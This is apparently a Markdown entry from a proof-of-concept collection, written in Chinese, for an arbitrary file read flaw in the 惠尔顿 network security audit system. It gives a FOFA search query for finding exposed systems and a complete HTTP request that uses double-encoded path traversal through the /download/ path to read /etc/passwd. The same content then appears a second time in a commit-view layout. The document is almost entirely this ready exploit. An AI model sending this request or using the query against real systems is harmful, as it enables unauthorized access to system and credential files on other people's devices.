POC/wpoc/惠尔顿-网络安全审计系统/惠尔顿-网络安全审计系统存在任意文件读取漏洞.md

## 惠尔顿-网络安全审计系统存在任意文件读取漏洞

## fofa
```
app="惠尔顿-网络安全审计系统"
```
![image](https://github.com/wy876/POC/assets/139549762/e66973bc-5f10-487e-a450-8ececd4c198f)

## poc
```
GET /download/..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
```

![image](https://github.com/wy876/POC/assets/139549762/a1659d87-afd3-45d0-8e89-c9f8782da4f8)
first commit 2025-03-04 23:12:57 +08:00			`## 惠尔顿-网络安全审计系统存在任意文件读取漏洞`

			`## fofa`
			```
			`app="惠尔顿-网络安全审计系统"`
			```
			`![image](https://github.com/wy876/POC/assets/139549762/e66973bc-5f10-487e-a450-8ececd4c198f)`

			`## poc`
			```
			`GET /download/..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1`
			`Host: your-ip`
			`User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15`
			`Accept-Encoding: gzip`
			`Connection: close`
			```

			`![image](https://github.com/wy876/POC/assets/139549762/a1659d87-afd3-45d0-8e89-c9f8782da4f8)`